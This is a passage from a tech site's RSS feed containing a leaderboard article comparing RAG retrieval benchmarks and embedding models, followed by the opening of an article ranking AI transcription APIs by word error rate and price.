<li><a href="https://hcompany.ai/surfer-2">Surfer 2 by H Company</a></li>
<li><a href="https://en.wikipedia.org/wiki/Dia_(web_browser)">Dia browser - Wikipedia</a></li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Tools</category><media:content url="https://awesomeagents.ai/images/tools/best-ai-browser-agents-2026_hu_a005a4c7f41314b3.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/tools/best-ai-browser-agents-2026_hu_a005a4c7f41314b3.jpg" width="1200" height="675"/></item><item><title>RAG Benchmarks Leaderboard: Retrieval Rankings 2026</title><link>https://awesomeagents.ai/leaderboards/rag-benchmarks-leaderboard/</link><pubDate>Fri, 17 Apr 2026 13:23:27 +0200</pubDate><guid>https://awesomeagents.ai/leaderboards/rag-benchmarks-leaderboard/</guid><description>&lt;p>Retrieval-augmented generation has become the default architecture for anything that needs to answer questions from a document corpus without hallucinating facts. If you're new to the concept, our &lt;a href="/guides/what-is-rag/">RAG explainer guide&lt;/a> covers the basics. The benchmark ecosystem around it has matured in parallel: today there are distinct evaluation tracks for retrieval quality, multilingual coverage, multi-hop reasoning, and end-to-end faithfulness. This leaderboard covers all of them.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>Retrieval-augmented generation has become the default architecture for anything that needs to answer questions from a document corpus without hallucinating facts. If you're new to the concept, our <a href="/guides/what-is-rag/">RAG explainer guide</a> covers the basics. The benchmark ecosystem around it has matured in parallel: today there are distinct evaluation tracks for retrieval quality, multilingual coverage, multi-hop reasoning, and end-to-end faithfulness. This leaderboard covers all of them.</p>
<p>Two things make RAG benchmarking unusual compared to language modeling leaderboards. First, you're assessing two different components - the embedding or retrieval model, and the generation model that reads what was retrieved. A great retriever paired with a weak generator will still hallucinate. Second, scores mean different things across benchmarks. A NDCG@10 on BEIR isn't the same animal as an Exact Match score on NQ, and comparing them directly misleads more than it informs.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>Gemini Embedding 2 leads the MTEB retrieval track with a 68.32 average and 67.71 on retrieval tasks specifically - the widest margin Google has held on this leaderboard</li>
<li>Voyage-4-large, released in January 2026 with a Mixture-of-Experts architecture, beats OpenAI text-embedding-3-large by 14% on NDCG@10 across 29 retrieval domains</li>
<li>For hallucination in RAG generation, GPT-4o and Claude 3.5 Sonnet remain the best commercial options - fine-tuned open models on RAGTruth data can approach that quality at much lower cost</li>
</ul>
</div>
<h2 id="what-each-benchmark-measures">What Each Benchmark Measures</h2>
<p>RAG evaluation splits cleanly into retrieval benchmarks and end-to-end RAG benchmarks. They test different failure modes.</p>
<p><strong>Retrieval benchmarks</strong> score how well a model finds the right documents given a query. The dominant metric is NDCG@10 (normalized discounted cumulative gain at rank 10), which rewards returning relevant documents at the top of the ranking and penalizes burying them lower down. Most retrieval benchmarks are zero-shot by design - models shouldn't be trained on the evaluation data.</p>
<p><strong>End-to-end RAG benchmarks</strong> score the full pipeline: does the produced answer actually match the gold answer, and does it stick to what was retrieved? The key metrics here are Exact Match (EM), F1, and faithfulness scores. A model that scores well on retrieval but has high hallucination rates on RAGTruth has a generation problem, not a retrieval problem.</p>
<h3 id="beir---the-generalization-test">BEIR - The Generalization Test</h3>
<p>BEIR (Benchmarking Information Retrieval) covers 18 diverse datasets including MS MARCO, Natural Questions, HotpotQA, and domain-specific corpora spanning biomedical, legal, scientific, and technical content. The benchmark is intentionally heterogeneous - a model that scores well here generalizes to out-of-distribution queries, which is what you actually want in production. BM25 scores around 42 NDCG@10 as the sparse baseline; modern dense models consistently clear 60.</p>
<h3 id="mteb-retrieval-track">MTEB Retrieval Track</h3>
<p>The Massive Text Embedding Benchmark includes a 15-dataset retrieval sub-track that overlaps with BEIR. MTEB is more structured about evaluation conditions and covers additional task categories (STS, classification, clustering) that let you see how retrieval performance relates to other embedding capabilities. It's the most widely used comparative leaderboard for embedding models.</p>
<h3 id="miracl---multilingual-retrieval">MIRACL - Multilingual Retrieval</h3>
<p>MIRACL covers 18 languages with native-speaker annotation for each, testing monolingual retrieval where both queries and documents are in the same language. The dataset spans languages from Arabic and Bengali to Swahili and Telugu. A model that scores well on English MTEB can still fall apart here - many commercial APIs drop 20-30% in retrieval quality when switching from English to lower-resource languages. The evaluation metric is nDCG@10 and Recall@100.</p>
<p>In May 2025, MIRACL-VISION extended the benchmark to visual document retrieval across the same 18 languages, exposing a different problem: state-of-the-art VLM embedding models lag text-based retrieval models by up to 59.7% in multilingual visual retrieval accuracy.</p>
<h3 id="ms-marco---large-scale-passage-ranking">MS MARCO - Large-Scale Passage Ranking</h3>
<p>MS MARCO is a large-scale dataset from real Bing queries and human-annotated passage relevance. The passage ranking task uses MRR@10 as the primary metric. Unlike BEIR, which tests generalization, MS MARCO is the closest thing to an in-distribution retrieval test for English web queries. Models optimized for MS MARCO tend to excel here but don't always transfer to domain-specific corpora.</p>
<h3 id="kilt---knowledge-intensive-tasks">KILT - Knowledge-Intensive Tasks</h3>
<p>KILT (Knowledge Intensive Language Tasks, from Meta AI) tests retrieval over a Wikipedia snapshot for 11 downstream tasks: fact-checking, open-domain QA, slot filling, entity linking, and dialogue. Systems need to retrieve supporting evidence and create answers that depend on that evidence. CoRAG-8B, released in January 2025, currently holds state-of-the-art scores across most KILT tasks, outperforming systems built on much larger LLMs.</p>
<h3 id="hotpotqa-and-natural-questions">HotpotQA and Natural Questions</h3>
<p>Both are multi-hop and open-domain QA benchmarks respectively. HotpotQA requires retrieving evidence from multiple documents and connecting it to answer questions that can't be answered from any single passage. NQ uses real Google search queries against Wikipedia. EM (Exact Match) and F1 are the standard metrics, and scores here reflect the combined quality of both retrieval and generation.</p>
<h3 id="ragtruth---hallucination-in-generation">RAGTruth - Hallucination in Generation</h3>
<p>RAGTruth is a corpus of nearly 18,000 RAG responses from multiple LLMs, annotated at the word level for hallucination type and severity. It's the most detailed benchmark specifically for the generation side of RAG - distinguishing between cases where the model invented unsupported facts, contradicted the retrieved context, or produced partially correct but misleading answers. The benchmark was introduced at ACL 2024 and has become the standard reference for comparing how different LLMs handle retrieved context faithfully.</p>
<p><img src="/images/leaderboards/rag-benchmarks-leaderboard-retrieval.jpg" alt="Retrieval quality varies significantly across document types, languages, and query styles">
<em>Retrieval benchmarks like BEIR test generalization across domains - medical, legal, code, and web queries each expose different model weaknesses.</em>
<small>Source: unsplash.com</small></p>
<h2 id="retrieval-model-rankings">Retrieval Model Rankings</h2>
<h3 id="mteb-retrieval--beir-leaders">MTEB Retrieval + BEIR Leaders</h3>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>MTEB Retrieval (nDCG@10)</th>
          <th>BEIR Avg (nDCG@10)</th>
          <th>Type</th>
          <th>Pricing</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>Gemini Embedding 2</td>
          <td>Google</td>
          <td>67.71</td>
          <td>~67.7</td>
          <td>API</td>
          <td>$0.20/M tokens ($0.10 batch)</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Voyage-4-large</td>
          <td>Voyage AI</td>
          <td>~66.0</td>
          <td>~66.0</td>
          <td>API</td>
          <td>200M free; paid tier</td>
      </tr>
      <tr>
          <td>3</td>
          <td>NV-Embed-v2</td>
          <td>NVIDIA</td>
          <td>62.65</td>
          <td>59.36</td>
          <td>Open-weight</td>
          <td>Free</td>
      </tr>
      <tr>
          <td>4</td>
          <td>Qwen3-Embedding-8B</td>
          <td>Alibaba</td>
          <td>~62.0</td>
          <td>~62.0</td>
          <td>Open-weight</td>
          <td>Free</td>
      </tr>
      <tr>
          <td>5</td>
          <td>Cohere Embed v4</td>
          <td>Cohere</td>
          <td>~61.0</td>
          <td>~61.0</td>
          <td>API</td>
          <td>$0.12/M tokens</td>
      </tr>
      <tr>
          <td>6</td>
          <td>OpenAI text-embedding-3-large</td>
          <td>OpenAI</td>
          <td>~59.0</td>
          <td>~59.0</td>
          <td>API</td>
          <td>$0.13/M tokens</td>
      </tr>
      <tr>
          <td>7</td>
          <td>BGE-M3</td>
          <td>BAAI</td>
          <td>~58.0</td>
          <td>~58.0</td>
          <td>Open-weight</td>
          <td>Free</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Voyage-3.5</td>
          <td>Voyage AI</td>
          <td>~57.5</td>
          <td>~57.5</td>
          <td>API</td>
          <td>200M free; paid tier</td>
      </tr>
      <tr>
          <td>9</td>
          <td>GTE-ModernBERT-base</td>
          <td>Alibaba/Community</td>
          <td>64.38*</td>
          <td>-</td>
          <td>Open-weight</td>
          <td>Free</td>
      </tr>
      <tr>
          <td>10</td>
          <td>BM25</td>
          <td>-</td>
          <td>~42.0</td>
          <td>~42.0</td>
          <td>Sparse baseline</td>
          <td>Free</td>
      </tr>
  </tbody>
</table>
<p>*GTE-ModernBERT-base score is on the full MTEB English average (not retrieval-only), using 149M parameters. It's included as the strongest efficient open-weight option under 150M parameters.</p>
<p>A few caveats on this table. Voyage AI publishes scores on their own RTEB benchmark (29 datasets across 8 domains) rather than MTEB, which makes direct comparison to MTEB scores approximate. On their own evaluation, voyage-4-large beats OpenAI text-embedding-3-large by 14% and Cohere Embed v4 by 8.2% in NDCG@10. MTEB is cross-vendor but self-reported; RTEB is vendor-controlled but more thorough. Neither is fully neutral.</p>
<h3 id="miracl-multilingual-rankings">MIRACL Multilingual Rankings</h3>
<p>For multilingual retrieval, the picture looks different:</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>nDCG@10 avg (MIRACL 18-lang)</th>
          <th>Notes</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>NVIDIA Llama-Embed-Nemotron-8B</td>
          <td>Best open-weight multilingual</td>
          <td>Tops MMTEB across 250+ languages</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Qwen3-Embedding-8B</td>
          <td>~70.58 (MMTEB avg)</td>
          <td>Strong on East Asian languages</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Cohere Embed v4</td>
          <td>Strong</td>
          <td>100+ languages; cross-lingual retrieval</td>
      </tr>
      <tr>
          <td>4</td>
          <td>Gemini Embedding 2</td>
          <td>Strong</td>
          <td>Multimodal; weaker on low-resource</td>
      </tr>
      <tr>
          <td>5</td>
          <td>BGE-M3</td>
          <td>~63.0</td>
          <td>BAAI multilingual model</td>
      </tr>
  </tbody>
</table>
<p>For production multilingual work, the best free option is NVIDIA Llama-Embed-Nemotron-8B. If you need a commercial API with broad language support, Cohere Embed v4 covers 100+ languages with cross-lingual retrieval (query in English, retrieve in French, etc.) and is the only major embedding API that also handles images natively.</p>
<h2 id="end-to-end-rag-generation-quality">End-to-End RAG: Generation Quality</h2>
<p>The generation side of RAG gets less systematic attention than retrieval, but RAGTruth and KILT give us data points.</p>
<p>On the RAGTruth hallucination benchmark, LLM performance varies enough to matter in production. GPT-4o and Claude 3.5 Sonnet produce the fewest hallucinations against retrieved context. Fine-tuned smaller models trained on RAGTruth data can reach competitive faithfulness at lower cost - the original paper showed that fine-tuning Llama-2-13B on RAGTruth training data matched prompt-based approaches with GPT-4. That gap has closed further with stronger base models in 2025-2026.</p>
<p>On KILT, CoRAG-8B (Chain-of-Retrieval Augmented Generation, January 2025) posts state-of-the-art performance on multi-hop QA tasks including HotpotQA subsets, beating systems built on LLMs three to five times larger. CoRAG uses iterative retrieval - the model retrieves, reads, decides if it needs more evidence, and retrieves again. Single-pass RAG struggles with multi-hop questions by design.</p>
<p><img src="/images/leaderboards/rag-benchmarks-leaderboard-scoring.jpg" alt="Scoring dimensions for RAG system evaluation: retrieval quality, faithfulness, and answer accuracy">
<em>End-to-end RAG evaluation requires tracking retrieval quality and generation faithfulness separately - strong retrieval with weak generation still produces hallucinated answers.</em>
<small>Source: unsplash.com</small></p>
<h2 id="key-takeaways">Key Takeaways</h2>
<h3 id="gemini-embedding-2-sets-a-new-bar">Gemini Embedding 2 Sets a New Bar</h3>
<p>Google released Gemini Embedding 2 into public preview in March 2026. It's built natively on the Gemini architecture and handles text, images, video, audio, and PDFs in a single 3,072-dimensional vector space. On MTEB English, it scores 68.32 overall and 67.71 on the retrieval sub-track, with Matryoshka support down to 768 dimensions.</p>
<p>The pricing is $0.20 per million tokens standard or $0.10 with batch processing. Indexing 1 million 500-token documents costs roughly $50 at batch rates. That's not cheap compared to open-weight models, but it's clearly less than the engineering cost of self-hosting a competitive open model. Early production reports mention 20% recall improvement and 70% latency reduction from users switching from older models - though those come from Google's own case studies, so treat them as directional.</p>
<p>The main limitation is vendor lock-in. Re-indexing a document corpus whenever you switch embedding models is a real operational burden. If you build on Gemini Embedding 2, plan for it long-term or architect an abstraction layer.</p>
<h3 id="the-moe-architecture-arrives-for-embeddings">The MoE Architecture Arrives for Embeddings</h3>
<p>Voyage-4-large, launched in January 2026, is the first production embedding model using a Mixture-of-Experts architecture. The MoE design routes different inputs to specialized sub-networks, delivering &quot;serving costs 40% lower than comparable dense models&quot; according to Voyage AI, while maintaining state-of-the-art accuracy. The model family includes voyage-4, voyage-4-lite, and voyage-4-nano (open-weight, Apache 2.0 on Hugging Face).</p>
<p>Voyage AI uses their own RTEB benchmark for evaluation rather than MTEB, which creates comparison friction. On RTEB, voyage-4-large outperforms Gemini Embedding 001 by 3.87% and OpenAI text-embedding-3-large by 14.05% in NDCG@10 across 29 datasets. Independent third-party scoring on MTEB puts the comparison closer, but Voyage models consistently sit in the top tier.</p>
<h3 id="open-weight-models-are-genuinely-competitive">Open-Weight Models Are Genuinely Competitive</h3>
<p>NVIDIA's NV-Embed-v2 posts 62.65 on the MTEB retrieval track - trailing Gemini Embedding 2's 67.71, but scoring higher than OpenAI text-embedding-3-large on retrieval specifically. NV-Embed-v2 reached 72.31 on the full MTEB average (56 tasks) using a two-stage contrastive instruction-tuning method. It's fully open-weight and runs on a single A100. For teams with GPU infrastructure already in place, self-hosting NV-Embed-v2 eliminates per-token costs completely.</p>
<p>Qwen3-Embedding-8B, Alibaba's multilingual model, scores 70.58 on the MMTEB multilingual leaderboard and supports flexible dimensions from 32 to 4096. Its code retrieval score on MTEB Code is 80.68, the highest reported for any model on that sub-benchmark. If your RAG system needs to retrieve code with natural language documentation, Qwen3-Embedding-8B is the current choice.</p>
<p>Our <a href="/leaderboards/embedding-model-leaderboard-mteb-march-2026/">embedding model leaderboard from March 2026</a> covers the full MTEB picture in more depth, including dimension tradeoffs and Matryoshka support across providers.</p>
<h3 id="bm25-is-still-alive-but-in-a-support-role">BM25 Is Still Alive, But in a Support Role</h3>
<p>Sparse retrieval with BM25 scores around 42 NDCG@10 on BEIR - below every modern dense model. But that doesn't mean BM25 is obsolete. Hybrid search combining BM25 with dense retrieval routinely beats either method alone, particularly on exact-match queries like product codes, person names, and technical identifiers. Dense models miss these because the learned vector space doesn't encode character-level patterns reliably. Most production RAG systems should use hybrid retrieval unless they have clear evidence that pure dense retrieval meets their precision requirements.</p>
<h3 id="multi-hop-rag-requires-a-different-stack">Multi-Hop RAG Requires a Different Stack</h3>
<p>Standard single-pass RAG - retrieve once, produce once - handles simple factoid questions reasonably well. It struggles with questions requiring evidence from multiple documents, temporal reasoning, or comparative analysis. On HotpotQA specifically, hybrid retrieval combining dense and lexical signals with maximum marginal relevance post-filtering achieves 20% absolute EM improvement over pure dense retrieval alone.</p>
<p>CoRAG-8B's iterative retrieve-read-decide-retrieve loop is the cleanest solution for multi-hop at inference time. It requires more compute per query (5-8 retrieval passes for hard questions), but the accuracy gains are significant. For production systems handling complex enterprise queries, iterative retrieval is worth the latency cost.</p>
<h3 id="ragperf-brings-system-level-measurement">RAGPerf Brings System-Level Measurement</h3>
<p>Most RAG benchmarks measure either retrieval quality or answer quality in isolation. RAGPerf, released on arXiv in March 2026, provides an end-to-end framework that simultaneously tracks context recall, query accuracy, factual consistency, latency, throughput, and GPU/memory use across a full pipeline. It supports multiple vector databases (LanceDB, Milvus, Qdrant, Chroma, Elasticsearch) and is open-sourced at <code>platformxlab/RAGPerf</code>. For teams building production systems, this is the first framework that lets you see retrieval accuracy tradeoffs against actual hardware costs in a single run.</p>
<h2 id="practical-guidance">Practical Guidance</h2>
<p>The right choice depends on which part of the pipeline you're improving.</p>
<p><strong>For best retrieval accuracy (API):</strong> Gemini Embedding 2 leads on MTEB retrieval at 67.71 NDCG@10. If you don't want Google lock-in, voyage-4-large is the alternative, with strong RTEB numbers and a lower-cost MoE architecture.</p>
<p><strong>For best retrieval accuracy (self-hosted):</strong> NV-Embed-v2 scores 62.65 on MTEB retrieval and is fully open-weight. Qwen3-Embedding-8B is preferred for multilingual or code-heavy workloads.</p>
<p><strong>For multilingual RAG:</strong> NVIDIA Llama-Embed-Nemotron-8B leads the MMTEB multilingual benchmark and is open-weight. For a commercial API, Cohere Embed v4 covers 100+ languages with cross-lingual support and multimodal capability.</p>
<p><strong>For budget-constrained pipelines:</strong> OpenAI text-embedding-3-small at $0.02/million tokens offers a reasonable retrieval score for the price. Voyage-4-nano is Apache 2.0 licensed, freely deployable, and designed for high-throughput low-cost retrieval.</p>
<p><strong>For multi-hop or complex queries:</strong> Single-pass RAG won't cut it. Build iterative retrieval into your pipeline. CoRAG-8B's approach is the current benchmark reference.</p>
<p><strong>For minimizing hallucination:</strong> Choose your generation model carefully. On RAGTruth evaluations, GPT-4o and Claude 3.5 Sonnet produce the fewest hallucinations when given retrieved context. Fine-tuning a smaller model on RAGTruth-style data is a viable lower-cost path. See our <a href="/tools/best-ai-rag-tools-2026/">guide to best RAG tools in 2026</a> for framework-level options including LangChain, LlamaIndex, and Haystack.</p>
<p><strong>What benchmark to trust:</strong> For retrieval comparison, use MTEB as the cross-vendor neutral standard. Be skeptical of vendor-internal benchmarks (including Voyage's RTEB) when they're the only numbers cited. For end-to-end faithfulness, RAGTruth is the most granular public reference. For multilingual, MIRACL and MMTEB are the appropriate benchmarks - English MTEB scores don't predict multilingual performance reliably.</p>
<hr>
<h2 id="faq">FAQ</h2>
<h3 id="which-embedding-model-is-best-for-rag-in-2026">Which embedding model is best for RAG in 2026?</h3>
<p>Gemini Embedding 2 leads on MTEB retrieval with 67.71 NDCG@10. For self-hosted options, NV-Embed-v2 and Qwen3-Embedding-8B are both competitive. For multilingual, NVIDIA Llama-Embed-Nemotron-8B leads.</p>
<h3 id="what-is-the-beir-benchmark">What is the BEIR benchmark?</h3>
<p>BEIR tests retrieval models across 18 diverse datasets covering web, biomedical, legal, and scientific content. It measures zero-shot generalization - models shouldn't be fine-tuned on BEIR data before evaluation. BM25 baseline is roughly 42 NDCG@10.</p>
<h3 id="how-does-mteb-differ-from-beir">How does MTEB differ from BEIR?</h3>
<p>MTEB includes the BEIR retrieval datasets plus additional task categories (STS, classification, clustering). MTEB is broader and used to compare general embedding quality. BEIR focuses exclusively on retrieval generalization.</p>
<h3 id="what-is-ragtruth-and-why-does-it-matter">What is RAGTruth and why does it matter?</h3>
<p>RAGTruth is a 18,000-response dataset annotated for hallucination type and severity in RAG outputs. It's the standard benchmark for comparing how faithfully different LLMs stick to retrieved context when creating answers.</p>
<h3 id="is-bm25-still-relevant-for-rag">Is BM25 still relevant for RAG?</h3>
<p>Yes. Hybrid retrieval combining BM25 with dense embeddings beats pure dense retrieval on exact-match queries. Most production RAG systems use hybrid search. Pure BM25 scores around 42 NDCG@10 on BEIR, well below modern dense models, but it handles keyword precision that dense models miss.</p>
<h3 id="how-often-do-rag-benchmark-rankings-change">How often do RAG benchmark rankings change?</h3>
<p>Retrieval rankings shift 2-4 times per year as major providers release new models. The current leaders (Gemini Embedding 2, Voyage-4-large) were both released or updated in early 2026. Check this page and the <a href="https://huggingface.co/spaces/mteb/leaderboard">MTEB leaderboard on Hugging Face</a> for the latest.</p>
<hr>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://huggingface.co/spaces/mteb/leaderboard">MTEB Leaderboard - Hugging Face</a></li>
<li><a href="https://github.com/beir-cellar/beir/wiki/Leaderboard">BEIR Benchmark - GitHub</a></li>
<li><a href="https://blog.voyageai.com/2026/01/15/voyage-4/">Voyage 4 Model Family Announcement</a></li>
<li><a href="https://blog.voyageai.com/2026/03/03/moe-voyage-4-large/">Voyage-4-large MoE Architecture Blog</a></li>
<li><a href="https://blog.voyageai.com/2025/05/20/voyage-3-5/">Voyage 3.5 Announcement</a></li>
<li><a href="https://huggingface.co/nvidia/NV-Embed-v2">NV-Embed-v2 on Hugging Face</a></li>
<li><a href="https://developer.nvidia.com/blog/nvidia-text-embedding-model-tops-mteb-leaderboard/">NVIDIA NV-Embed MTEB Announcement</a></li>
<li><a href="https://project-miracl.github.io/">MIRACL Benchmark Project</a></li>
<li><a href="https://arxiv.org/abs/2502.13595">MMTEB: Massive Multilingual Text Embedding Benchmark - arXiv</a></li>
<li><a href="https://aclanthology.org/2024.acl-long.585/">RAGTruth - ACL 2024</a></li>
<li><a href="https://arxiv.org/abs/2603.10765">RAGPerf: End-to-End RAG Benchmarking Framework - arXiv</a></li>
<li><a href="https://microsoft.github.io/MSMARCO-Passage-Ranking-Submissions/leaderboard/">MS MARCO Passage Ranking Leaderboard</a></li>
<li><a href="https://github.com/facebookresearch/KILT">KILT Benchmark - GitHub</a></li>
<li><a href="https://hotpotqa.github.io/">HotpotQA Dataset</a></li>
</ul>
]]></content:encoded><dc:creator>James Kowalski</dc:creator><category>Leaderboards</category><media:content url="https://awesomeagents.ai/images/leaderboards/rag-benchmarks-leaderboard_hu_a72ed34d564042be.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/leaderboards/rag-benchmarks-leaderboard_hu_a72ed34d564042be.jpg" width="1200" height="675"/></item><item><title>Best AI Transcription Tools 2026: APIs and Services Ranked</title><link>https://awesomeagents.ai/tools/best-ai-transcription-tools-2026/</link><pubDate>Fri, 17 Apr 2026 13:23:22 +0200</pubDate><guid>https://awesomeagents.ai/tools/best-ai-transcription-tools-2026/</guid><description>&lt;p>Transcription is one of the most deceptively hard problems in AI. The WER numbers vendors publish look great until you feed in a noisy podcast recording with two overlapping speakers and a few proper nouns. Then the real differences show up.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>Transcription is one of the most deceptively hard problems in AI. The WER numbers vendors publish look great until you feed in a noisy podcast recording with two overlapping speakers and a few proper nouns. Then the real differences show up.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>Deepgram Nova-3 is the fastest and most cost-effective API for developers - $0.0043/min for pre-recorded English with native streaming support</li>
<li>AssemblyAI Universal-3 Pro leads on accuracy for challenging audio - 5.72% average WER across English benchmarks per its February 2026 evaluation</li>
<li>OpenAI's gpt-4o-transcribe at $0.006/min is the easiest drop-in for teams already on the OpenAI stack, with strong accuracy but no real-time streaming parity</li>
</ul>
</div>
<p>These tools are not meeting assistants. If you need AI to join a Zoom and take notes, that's a separate category - we cover it in <a href="/tools/best-ai-meeting-assistants-2026/">Best AI Meeting Assistants 2026</a>. The tools here are dedicated transcription engines for podcasters, legal firms, video producers, researchers, and developers building voice pipelines. The typical use case is a file upload or a live audio stream that needs to come back as clean, speaker-attributed text with timestamps.</p>
<p>The comparison spans API-first services (Deepgram, AssemblyAI, OpenAI, Google Cloud, Rev AI), professional SaaS tools (Sonix, Descript, HappyScribe, Trint), and the open-source Whisper option for teams that want full control.</p>
<h2 id="why-this-category-is-different-from-meeting-ai">Why This Category Is Different from Meeting AI</h2>
<p>Meeting assistants layer on top of a transcription engine and add scheduling, action items, and CRM sync. Transcription tools are lower in the stack. A developer building a podcast hosting platform doesn't need summaries - they need clean SRT files and a reliable API. A court reporting firm needs verbatim accuracy above 98% and a clear audit trail.</p>
<p>The tradeoffs matter differently here. Latency for batch transcription doesn't matter much; accuracy and format support do. For real-time captioning or live subtitles, streaming latency is everything. Speaker diarization quality is critical for any multi-speaker audio - interview recordings, depositions, panel discussions.</p>
<p>For teams also needing text-to-speech or voice synthesis, our <a href="/tools/best-ai-voice-generators-2026/">Best AI Voice Generators 2026</a> covers the output side of the pipeline.</p>
<hr>
<h2 id="accuracy-benchmarks-what-the-numbers-actually-mean">Accuracy Benchmarks: What the Numbers Actually Mean</h2>
<p>Word Error Rate (WER) is the standard metric, but vendor-published benchmarks are almost always optimistic. Most use clean audio at moderate speeds with standard vocabulary. Real-world audio - phone calls, noisy environments, heavy accents, technical jargon - normally delivers WER 2x to 4x worse than the headline number.</p>
<p>AssemblyAI publishes one of the more credible independent benchmark reports, running evaluations across 250+ hours of audio from 26 datasets. Their February 2026 results cover English and multilingual performance.</p>
<p><strong>English WER across major providers (AssemblyAI benchmark, February 2026):</strong></p>
<table>
  <thead>
      <tr>
          <th>Provider</th>
          <th>CommonVoice</th>
          <th>Podcast</th>
          <th>Noisy Audio</th>
          <th>LibriSpeech Clean</th>
          <th>Average</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>AssemblyAI</td>
          <td>4.13%</td>
          <td>6.65%</td>
          <td>9.97%</td>
          <td>1.46%</td>
          <td><strong>5.72%</strong></td>
      </tr>
      <tr>
          <td>ElevenLabs</td>
          <td>5.38%</td>
          <td>10.90%</td>
          <td>13.72%</td>
          <td>2.17%</td>
          <td>7.08%</td>
      </tr>
      <tr>
          <td>OpenAI</td>
          <td>8.52%</td>
          <td>10.32%</td>
          <td>11.63%</td>
          <td>2.28%</td>
          <td>7.45%</td>
      </tr>
      <tr>
          <td>Amazon</td>
          <td>5.16%</td>
          <td>11.23%</td>
          <td>24.73%</td>
          <td>2.05%</td>
          <td>8.14%</td>
      </tr>
      <tr>
          <td>Deepgram</td>
          <td>10.45%</td>
          <td>10.23%</td>
          <td>14.12%</td>
          <td>2.56%</td>
          <td>8.38%</td>
      </tr>
      <tr>
          <td>Microsoft</td>
          <td>7.76%</td>
          <td>11.37%</td>
          <td>14.26%</td>
          <td>2.32%</td>
          <td>8.14%</td>
      </tr>
  </tbody>
</table>
<p>The Noisy Audio column is where things fall apart. Amazon's 24.73% WER on noisy audio is nearly unusable for real-world podcast or field recording work. Deepgram's Nova-3 separate benchmark reports a 5.26% batch WER on their own test set - the discrepancy with AssemblyAI's 8.38% average illustrates exactly why cross-vendor benchmarks are valuable.</p>
<p>For multilingual audio, ElevenLabs edges ahead with a 8.75% average against AssemblyAI's 9.78%, though both are well ahead of Deepgram (12.82%) and Microsoft (12.62%).</p>
<p>These benchmarks were published by AssemblyAI, so treat them with appropriate skepticism - they have an obvious interest in favorable numbers. That said, their methodology is documented and they include datasets where they don't win.</p>
<p><img src="/images/tools/best-ai-transcription-tools-2026-podcast.jpg" alt="A man wearing headphones recording at a professional microphone setup">
<em>Dedicated transcription APIs are the right tool for podcast producers, interviewers, and media teams - not meeting bots.</em>
<small>Source: pexels.com</small></p>
<hr>
<h2 id="api-first-transcription-engines">API-First Transcription Engines</h2>
<h3 id="deepgram-nova-3">Deepgram Nova-3</h3>
<p>Deepgram's Nova-3 is the most developer-friendly option in this space. The API design is clean, documentation is thorough, and the streaming latency is genuinely low - Deepgram claims 300ms time-to-first-token for real-time streaming. For anyone building a voice agent, live captioning service, or anything requiring sub-second response, Nova-3 is the practical default.</p>
<p><strong>Pricing (Pay As You Go):</strong></p>
<ul>
<li>Pre-recorded English: $0.0043/min ($0.26/hr)</li>
<li>Streaming English: $0.0077/min ($0.46/hr)</li>
<li>Pre-recorded multilingual: $0.0052/min ($0.31/hr)</li>
<li>Speaker diarization add-on: +$0.0020/min ($0.12/hr)</li>
<li>Smart formatting: included</li>
</ul>
<p>The Growth plan (annual commitment, $4K+ minimum) cuts pre-recorded English to $0.0036/min. Nova-3 supports 36+ languages. Output formats include JSON with word-level timestamps, SRT, and VTT. DOCX export requires post-processing.</p>
<p>Where Nova-3 loses ground is on noisy or heavily accented audio, where AssemblyAI's numbers pull ahead. Deepgram also publishes their own benchmarks claiming a 30% WER advantage over competitors - the conflict between their numbers and AssemblyAI's data is unresolved. Test on your own audio.</p>
<h3 id="assemblyai-universal-3-pro">AssemblyAI Universal-3 Pro</h3>
<p>AssemblyAI's current flagship model adds structured formatting, keyterm prompting, and medical mode on top of base transcription. The Universal-2 model (still available) remains solid for most use cases at a lower price.</p>
<p><strong>Pricing:</strong></p>
<ul>
<li>Universal-3 Pro (pre-recorded): $0.21/hr base</li>
<li>Universal-3 Pro Streaming: $0.45/hr base</li>
<li>Universal-2 (pre-recorded): $0.15/hr base</li>
<li>Speaker diarization: +$0.02/hr (pre-recorded), +$0.12/hr (streaming)</li>
<li>Medical mode: +$0.15/hr on top of base</li>
</ul>
<p>The feature set is the strongest here. Speaker identification, sentiment analysis, entity detection, PII redaction, and summarization are all available as add-ons. Entities and PII redaction cost extra but the API is clean and well-documented. AssemblyAI's Universal-3 Pro Medical model claims a 4.97% Missed Entity Rate on clinical terminology - medical practices and legal firms with domain vocabulary should test this tier specifically.</p>
<p>The free tier includes $50 in credits with no card required.</p>
<h3 id="openai-gpt-4o-transcribe--whisper-1">OpenAI (gpt-4o-transcribe / Whisper-1)</h3>
<p>OpenAI now has two transcription tiers. The original Whisper-1 pricing has been replaced with the gpt-4o family as the recommended path.</p>
<p><strong>Pricing:</strong></p>
<ul>
<li>gpt-4o-transcribe: $0.006/min ($0.36/hr)</li>
<li>gpt-4o-mini-transcribe: $0.003/min ($0.18/hr)</li>
</ul>
<p>The gpt-4o-transcribe model reaches 2.46% WER on FLEURS benchmarks - one of the lowest published numbers. Real-world performance is strong, especially on clear speech and standard English. It struggles more on heavy accents and noisy environments than the benchmark suggests.</p>
<p>The main limitation is the API design. There's no native streaming model comparable to Deepgram. You upload a file and get back text. For batch workflows - transcribing podcast episodes, video libraries, interview archives - it works well. For real-time use cases, the architecture requires workarounds.</p>
